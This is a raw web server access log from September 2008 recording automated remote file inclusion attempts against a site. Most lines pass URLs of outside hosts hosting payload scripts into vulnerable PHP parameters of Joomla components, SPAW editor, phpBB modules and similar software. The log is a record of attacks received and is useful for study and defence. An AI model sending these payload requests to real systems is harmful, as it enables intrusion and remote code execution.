87.226.77.5 - - [07/Sep/2008:07:04:32 -0400] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 317
87.226.77.5 - - [07/Sep/2008:07:04:36 -0400] "GET /log/admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 321
85.25.150.230 - - [07/Sep/2008:07:04:51 -0400] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 333
85.25.150.230 - - [07/Sep/2008:07:04:51 -0400] "GET /log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 337
87.226.77.5 - - [07/Sep/2008:07:05:03 -0400] "GET /log/sdaglobal.org-access_log.1/admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 348
92.51.145.83 - - [07/Sep/2008:07:05:03 -0400] "GET /phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 292
87.226.77.5 - - [07/Sep/2008:07:05:06 -0400] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 317
87.226.77.5 - - [07/Sep/2008:07:05:10 -0400] "GET /log/admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 321
87.226.77.5 - - [07/Sep/2008:07:06:38 -0400] "GET /log/sdaglobal.org-access_log.1/admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 348
200.31.206.138 - - [07/Sep/2008:07:06:41 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 326
87.226.77.5 - - [07/Sep/2008:07:06:42 -0400] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 317
200.31.206.138 - - [07/Sep/2008:07:06:44 -0400] "GET /log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 330
87.226.77.5 - - [07/Sep/2008:07:06:45 -0400] "GET /log/admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 321
85.25.129.240 - - [07/Sep/2008:07:07:20 -0400] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 333
85.25.129.240 - - [07/Sep/2008:07:07:21 -0400] "GET /log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 337
92.51.145.83 - - [07/Sep/2008:07:07:22 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 353
85.17.10.109 - - [07/Sep/2008:07:07:38 -0400] "GET /log/sdaglobal.org-access_log.1//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 369
74.52.139.226 - - [07/Sep/2008:07:07:39 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tricospeb.net/wow/pix/roxx.jpg??? HTTP/1.1" 404 329
85.17.10.109 - - [07/Sep/2008:07:07:42 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 338
87.226.77.5 - - [07/Sep/2008:07:07:58 -0400] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 317
87.226.77.5 - - [07/Sep/2008:07:07:59 -0400] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 317
85.17.10.109 - - [07/Sep/2008:07:08:16 -0400] "GET /log/sdaglobal.org-access_log.1//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 369
85.17.10.109 - - [07/Sep/2008:07:08:19 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 338
85.17.10.109 - - [07/Sep/2008:07:08:22 -0400] "GET /log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 342
85.17.10.109 - - [07/Sep/2008:07:08:56 -0400] "GET /log/sdaglobal.org-error_log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 366
72.29.92.206 - - [07/Sep/2008:07:09:36 -0400] "GET /log/sdaglobal.org-access_log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 372
72.29.92.206 - - [07/Sep/2008:07:09:36 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 343
72.29.92.206 - - [07/Sep/2008:07:09:36 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 347
72.29.92.206 - - [07/Sep/2008:07:09:51 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 343
85.17.10.109 - - [07/Sep/2008:07:09:58 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 338
85.17.10.109 - - [07/Sep/2008:07:10:21 -0400] "GET /log/sdaglobal.org-error_log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 366
87.226.77.5 - - [07/Sep/2008:07:10:48 -0400] "GET /log/sdaglobal.org-error_log/admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 345
200.31.206.138 - - [07/Sep/2008:07:11:01 -0400] "GET /log/sdaglobal.org-access_log.1/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 357
200.49.145.16 - - [07/Sep/2008:07:11:14 -0400] "GET /errors.php?error=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 291
66.249.66.66 - - [07/Sep/2008:07:11:34 -0400] "GET /images/hopetalk.gif HTTP/1.1" 304 -
81.176.226.180 - - [07/Sep/2008:07:12:32 -0400] "GET /log/sdaglobal.org-access_log.1/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 369
81.176.226.180 - - [07/Sep/2008:07:12:32 -0400] "GET /log/sdaglobal.org-access_log.1/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 369
81.176.226.180 - - [07/Sep/2008:07:12:33 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 338
81.176.226.180 - - [07/Sep/2008:07:12:33 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 338
81.176.226.180 - - [07/Sep/2008:07:12:33 -0400] "GET /log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 342
81.176.226.180 - - [07/Sep/2008:07:12:33 -0400] "GET /log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 342
87.226.77.5 - - [07/Sep/2008:07:12:40 -0400] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 317
67.15.48.60 - - [07/Sep/2008:07:13:28 -0400] "GET /log/sdaglobal.org-access_log//skin/zero_vote/ask_password.php?dir=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 342
67.15.48.60 - - [07/Sep/2008:07:13:28 -0400] "GET /log//skin/zero_vote/ask_password.php?dir=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 317
67.15.48.60 - - [07/Sep/2008:07:13:30 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 313
74.52.139.226 - - [07/Sep/2008:07:15:11 -0400] "GET /log/sdaglobal.org-error_log.4//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tricospeb.net/wow/pix/roxx.jpg??? HTTP/1.1" 404 359
74.52.139.226 - - [07/Sep/2008:07:15:14 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tricospeb.net/wow/pix/roxx.jpg??? HTTP/1.1" 404 329
74.52.139.226 - - [07/Sep/2008:07:15:16 -0400] "GET /log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tricospeb.net/wow/pix/roxx.jpg??? HTTP/1.1" 404 333
87.226.77.5 - - [07/Sep/2008:07:15:30 -0400] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 317
81.176.226.180 - - [07/Sep/2008:07:15:34 -0400] "GET /log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 342
81.176.226.180 - - [07/Sep/2008:07:15:34 -0400] "GET /log/sdaglobal.org-access_log.1/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 369
81.176.226.180 - - [07/Sep/2008:07:15:34 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 338
81.176.226.180 - - [07/Sep/2008:07:15:41 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 338
81.176.226.180 - - [07/Sep/2008:07:15:41 -0400] "GET /log/sdaglobal.org-access_log.1/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 369
81.176.226.180 - - [07/Sep/2008:07:15:41 -0400] "GET /log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 342
92.51.145.83 - - [07/Sep/2008:07:16:55 -0400] "GET /log/sdaglobal.org-access_log.1/phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 323
92.51.145.83 - - [07/Sep/2008:07:16:56 -0400] "GET /log/phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 296
92.51.145.83 - - [07/Sep/2008:07:17:01 -0400] "GET /log/sdaglobal.org-access_log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 382
92.51.145.83 - - [07/Sep/2008:07:17:01 -0400] "GET /log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 357
92.51.145.83 - - [07/Sep/2008:07:17:14 -0400] "GET /log/sdaglobal.org-error_log.3/phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 322
63.247.141.8 - - [07/Sep/2008:07:18:31 -0400] "GET //parse/parser.php?WN_BASEDIR=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 298
63.247.141.8 - - [07/Sep/2008:07:18:31 -0400] "GET /log//parse/parser.php?WN_BASEDIR=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 302
81.176.226.180 - - [07/Sep/2008:07:19:08 -0400] "GET /log/sdaglobal.org-access_log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 367
81.176.226.180 - - [07/Sep/2008:07:19:09 -0400] "GET /log/sdaglobal.org-access_log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 367
195.39.5.203 - - [07/Sep/2008:07:19:18 -0400] "GET /log/sdaglobal.org-access_log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 382
195.39.5.203 - - [07/Sep/2008:07:19:18 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 353
195.39.5.203 - - [07/Sep/2008:07:19:18 -0400] "GET /log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 357
217.20.138.101 - - [07/Sep/2008:07:19:22 -0400] "GET /log/sdaglobal.org-access_log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 362
217.20.138.101 - - [07/Sep/2008:07:19:22 -0400] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 333
217.20.138.101 - - [07/Sep/2008:07:19:22 -0400] "GET /log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 337
217.20.138.101 - - [07/Sep/2008:07:19:48 -0400] "GET /log/sdaglobal.org-error_log.1//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 363
200.31.206.138 - - [07/Sep/2008:07:21:33 -0400] "GET /log/sdaglobal.org-access_log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 355
200.31.206.138 - - [07/Sep/2008:07:21:33 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 326
200.31.206.138 - - [07/Sep/2008:07:21:33 -0400] "GET /log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 330
217.20.138.101 - - [07/Sep/2008:07:22:11 -0400] "GET /log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 337
217.20.138.101 - - [07/Sep/2008:07:22:11 -0400] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 333
217.160.189.11 - - [07/Sep/2008:07:22:24 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 322
217.160.189.11 - - [07/Sep/2008:07:22:24 -0400] "GET /log/errors.php?error=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 295
81.176.226.180 - - [07/Sep/2008:07:22:49 -0400] "GET /log/sdaglobal.org-access_log%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 368
81.176.226.180 - - [07/Sep/2008:07:22:55 -0400] "GET /log/sdaglobal.org-access_log%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 368
200.49.145.16 - - [07/Sep/2008:07:23:05 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 320
200.49.145.16 - - [07/Sep/2008:07:23:05 -0400] "GET /log/errors.php?error=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 295
200.31.206.138 - - [07/Sep/2008:07:23:41 -0400] "GET /log/sdaglobal.org-access_log.1/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 357
217.20.138.101 - - [07/Sep/2008:07:23:43 -0400] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 333
83.240.154.200 - - [07/Sep/2008:07:23:46 -0400] "GET /log/sdaglobal.org-error_log.4/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tricospeb.net/wow/pix/idi.txt?? HTTP/1.1" 404 394
83.240.154.200 - - [07/Sep/2008:07:23:46 -0400] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tricospeb.net/wow/pix/idi.txt?? HTTP/1.1" 404 364
83.240.154.200 - - [07/Sep/2008:07:23:47 -0400] "GET /log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tricospeb.net/wow/pix/idi.txt?? HTTP/1.1" 404 368
210.48.67.39 - - [07/Sep/2008:07:25:22 -0400] "GET /log/sdaglobal.org-access_log.1/lostpasswd.php?env[include_prefix]=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 326
210.48.67.39 - - [07/Sep/2008:07:25:23 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 295
210.48.67.39 - - [07/Sep/2008:07:25:23 -0400] "GET /log/lostpasswd.php?env[include_prefix]=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 299
74.200.202.37 - - [07/Sep/2008:07:26:20 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 353
74.200.202.37 - - [07/Sep/2008:07:26:20 -0400] "GET /log/sdaglobal.org-access_log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 382
74.200.202.37 - - [07/Sep/2008:07:26:20 -0400] "GET /log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 357
216.180.251.34 - - [07/Sep/2008:07:29:48 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 313
210.48.67.39 - - [07/Sep/2008:07:30:22 -0400] "GET /log/sdaglobal.org-access_log/lostpasswd.php?env[include_prefix]=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 324
63.247.141.8 - - [07/Sep/2008:07:30:32 -0400] "GET /log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 357
63.247.141.8 - - [07/Sep/2008:07:30:32 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 353
193.164.131.35 - - [07/Sep/2008:07:31:16 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 353
193.164.131.35 - - [07/Sep/2008:07:31:17 -0400] "GET /log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 326
66.187.101.14 - - [07/Sep/2008:07:32:11 -0400] "GET /phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 292
59.125.183.76 - - [07/Sep/2008:07:32:43 -0400] "GET /log//doceboCms/class/class.dashboard_cms.php?where_framework=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 325
59.125.183.76 - - [07/Sep/2008:07:32:44 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 321
195.39.5.203 - - [07/Sep/2008:07:35:49 -0400] "GET /log/sdaglobal.org-access_log.1//yoorius/bbs//skin/zero_vote/ask_password.php?dir=http://www.persianplatform.com//groups/gallery/id.txt?%0D? HTTP/1.1" 404 357
195.39.5.203 - - [07/Sep/2008:07:35:49 -0400] "GET /log//yoorius/bbs//skin/zero_vote/ask_password.php?dir=http://www.persianplatform.com//groups/gallery/id.txt?%0D? HTTP/1.1" 404 330
195.39.5.203 - - [07/Sep/2008:07:35:49 -0400] "GET //yoorius/bbs//skin/zero_vote/ask_password.php?dir=http://www.persianplatform.com//groups/gallery/id.txt?%0D? HTTP/1.1" 404 326
193.164.131.35 - - [07/Sep/2008:07:35:51 -0400] "GET /log/sdaglobal.org-error_log.3/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 352
72.29.65.194 - - [07/Sep/2008:07:36:39 -0400] "GET /log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 344
87.230.21.231 - - [07/Sep/2008:07:36:39 -0400] "GET /log//WebCalendar//tools/send_reminders.php?noSet=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 323
72.29.65.194 - - [07/Sep/2008:07:36:40 -0400] "GET /log/sdaglobal.org-access_log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 369
72.29.65.194 - - [07/Sep/2008:07:36:40 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 340
87.230.21.231 - - [07/Sep/2008:07:36:42 -0400] "GET //WebCalendar//tools/send_reminders.php?noSet=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 319
72.29.65.194 - - [07/Sep/2008:07:37:04 -0400] "GET /log/sdaglobal.org-error_log.1//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 370
81.176.226.180 - - [07/Sep/2008:07:37:10 -0400] "GET /log/sdaglobal.org-access_log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 367
81.176.226.180 - - [07/Sep/2008:07:37:23 -0400] "GET /log/sdaglobal.org-access_log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 367
63.247.141.8 - - [07/Sep/2008:07:37:55 -0400] "GET /log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 357
92.51.145.83 - - [07/Sep/2008:07:38:01 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 353
67.18.107.66 - - [07/Sep/2008:07:38:29 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 340
67.18.107.66 - - [07/Sep/2008:07:38:29 -0400] "GET /log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 344
67.18.107.66 - - [07/Sep/2008:07:38:30 -0400] "GET /log/sdaglobal.org-access_log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 369
67.18.107.66 - - [07/Sep/2008:07:39:10 -0400] "GET /log/sdaglobal.org-error_log.1//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 370
88.84.157.127 - - [07/Sep/2008:07:39:45 -0400] "GET /log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 344
